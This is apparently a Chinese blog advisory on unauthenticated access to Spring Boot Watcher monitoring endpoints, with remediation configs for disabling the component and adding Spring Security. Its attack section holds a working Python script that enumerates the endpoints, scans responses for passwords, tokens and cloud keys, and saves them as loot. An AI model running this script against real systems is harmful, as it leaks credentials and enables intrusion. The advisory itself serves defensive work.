Spring Boot Watcher 未授权访问漏洞

Spring Boot Watcher 未授权访问漏洞

  • [1. 漏洞基础信息](#1. 漏洞基础信息)
  • [2. 漏洞影响范围](#2. 漏洞影响范围)
  • [3. 攻击手法](#3. 攻击手法)
  • [4. 漏洞修复](#4. 漏洞修复)
    • [4.1 生产环境直接关闭 Watcher](#4.1 生产环境直接关闭 Watcher)
    • [4.2 Spring Security 拦截](#4.2 Spring Security 拦截)
    • [4.3 通过 ng 等网关拦截](#4.3 通过 ng 等网关拦截)

1. 漏洞基础信息

  • 漏洞名称:Spring Boot Watcher 未授权访问漏洞
  • 组件简介: Watcher 是一类基于 Spring Boot 的应用监控/巡检组件,对外暴露应用运行时信息。其设计目标与 Spring Boot Actuator、JavaMelody 类似,用于运维人员在生产环境快速排查系统问题。Watcher 通常以一个总入口(如 /watcher/starter)作为索引页,列出所有可访问的子端点
  • 漏洞类型:未授权访问 / 敏感信息泄露(CWE-285、CWE-200、CWE-538)
  • 漏洞本质: Watcher 模块在默认部署场景下不携带任何鉴权机制。当开发者在集成时未通过 Spring Security、过滤器、网关或反向代理对 /watcher/ 路径进行访问控制时,所有监控子端点(包括系统信息、线程、内存、磁盘、JDBC 连接信息等)均可被任意访问者直接获取,造成大规模敏感信息泄露,并为后续攻击提供完整情报

2. 漏洞影响范围

集成 Watcher 模块但未对 /watcher/ 配置访问控制策略的应用

访问 /watcher/starter 后,通常可看到如下索引页:

  • sysinfo 系统信息(OS、内核、CPU、主机名等)
  • threadinfo 线程概览(数量、状态分布)
  • threadlist 线程明细(堆栈、锁、ThreadName)
  • meminfo JVM 内存使用情况
  • mempoolinfo 内存池详情(Eden、Survivor、Old、Metaspace)
  • gcinfo GC 收集器信息与回收统计
  • sysenv 系统环境变量(含敏感凭据)
  • sysprops JVM 系统属性(含路径、用户名等)
  • diskSize 磁盘空间与挂载点
  • connectionInfo 数据库连接池、JDBC URL、用户名等
  • jmapHistoInfo 类实例直方图(类名、对象数、占用大小)
  • custom_index 业务自定义监控指标
  • count_index 调用次数统计

3. 攻击手法

编写自动化利用脚本:

python 复制代码
import requests
import json

ENDPOINTS = [
    "sysinfo", "threadinfo", "threadlist", "meminfo", "mempoolinfo",
    "gcinfo", "sysenv", "sysprops", "diskSize", "connectionInfo",
    "jmapHistoInfo", "custom_index", "count_index"
]

SENSITIVE_KEYS = ["password", "secret", "token", "key", "jdbc", "passwd",
                  "AWS", "AK", "SK", "nacos"]

def scan(target):
    print(f"[+] Target: {target}")
    if requests.get(f"{target}/watcher/starter", timeout=5).status_code != 200:
        print("[-] Not vulnerable")
        return

    for ep in ENDPOINTS:
        try:
            r = requests.get(f"{target}/watcher/{ep}", timeout=10)
            if r.status_code == 200:
                content = r.text
                hits = [k for k in SENSITIVE_KEYS if k.lower() in content.lower()]
                tag = f" [HIT: {','.join(hits)}]" if hits else ""
                print(f"[+] /watcher/{ep} OK ({len(content)} bytes){tag}")
                with open(f"loot_{ep}.json", "w") as f:
                    f.write(content)
        except Exception as e:
            print(f"[-] /watcher/{ep} error: {e}")

if __name__ == "__main__":
    scan("http://target.com")

4. 漏洞修复

4.1 生产环境直接关闭 Watcher

yaml 复制代码
# application-prod.yml
watcher:
  enabled: false
spring:
  autoconfigure:
    exclude:
      - com.xxx.watcher.WatcherAutoConfiguration

4.2 Spring Security 拦截

java 复制代码
@Configuration
public class WatcherSecurityConfig {
    @Bean
    public SecurityFilterChain watcherFilterChain(HttpSecurity http) throws Exception {
        http
            .securityMatcher("/watcher/**")
            .authorizeHttpRequests(auth -> auth
                .anyRequest().hasRole("OPS_ADMIN")
            )
            .httpBasic(Customizer.withDefaults())
            .csrf(csrf -> csrf.disable());
        return http.build();
    }
}

4.3 通过 ng 等网关拦截

相关推荐
@insist1238 小时前
系统规划与管理师-信息安全规划核心考点解析:概述与安全架构
安全·软考·安全架构·系统规划与管理师·软件水平考试·系统规划与管理工程师
IT小白杨9 小时前
从移动指纹到App隔离:TikTok Shop跨境电商账号安全管理实战
安全·新媒体运营·业界资讯·指纹浏览器
其实防守也摸鱼9 小时前
运维--怎么看接口的请求和返回
运维·学习·网络安全·网络攻击模型·burpsuite·攻防对抗·蓝队
humors2219 小时前
【分享】火绒恶意网址自定义规则,根据互联网应急中心部分威胁预警恶意代码制作
网络·安全·规则·火绒安全·恶意网址·应急中心
工程管理笔记10 小时前
工程发票与资金管理系统:蓝燕云进销项发票台账功能
安全
爱折腾的小黑牛13 小时前
礼账小程序的数据安全方案:加密与备份
数据库·安全
沫离痕15 小时前
Cassandra 4.0.11 Docker 安装与配置手册
java·spring boot
humors22115 小时前
【转帖】安全企业发布iOS漏洞攻击风险检测工具
安全·ios·手机·苹果
菩提小狗16 小时前
每日安全情报报告 · 2026-07-09
网络安全·漏洞·cve·安全情报·每日安全